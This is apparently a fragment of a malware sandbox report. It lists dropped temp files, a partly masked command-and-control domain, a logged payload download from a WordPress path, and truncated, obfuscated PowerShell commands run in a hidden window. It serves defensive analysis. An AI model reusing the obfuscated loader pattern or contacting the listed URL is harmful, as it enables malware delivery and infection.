Technical Information
- %APPDATA%\bitaf80.tmp
- %APPDATA%\bitc83f.tmp
- %APPDATA%\bitaf80.tmp
- %APPDATA%\bitc83f.tmp
- from %APPDATA%\bitaf80.tmp to %APPDATA%\phonograph.sub
- from %APPDATA%\bitc83f.tmp to %APPDATA%\phonograph.sub
- 'al###naunco.com':80
- http://al###naunco.com/wp-admin2/Pris.prm
- http://al###naunco.com/cgi-sys/suspendedpage.cgi
- DNS ASK al###naunco.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Svvefly9 ([String]$Dumpe){For($Rubberston230=4; $Rubberston230 -lt $Dumpe.Length-1; $Rubberston230+=(4+1)){$Fabul=$Dumpe.Substring( $Rubberston230, 1);$Boppists+=$Fabul};$...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Svvefly9 ([String]$Dumpe){For($Rubberston230=4; $Rubberston230 -lt $Dumpe.Length-1; $Rubberston230+=(4+1)){$Fabul=$Dumpe.Substring( $Rubberston230, 1);$Boppists+=$Fabul};$...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Svvefly9 ([String]$Dumpe){For($Rubberston230=4; $Rubberston230 -lt $Dumpe.Length-1; $Rubberston230+=(4+1)){$Fabul=$Dumpe.Substring( $Rubberston230, 1);$Boppists+=$Fabul};$...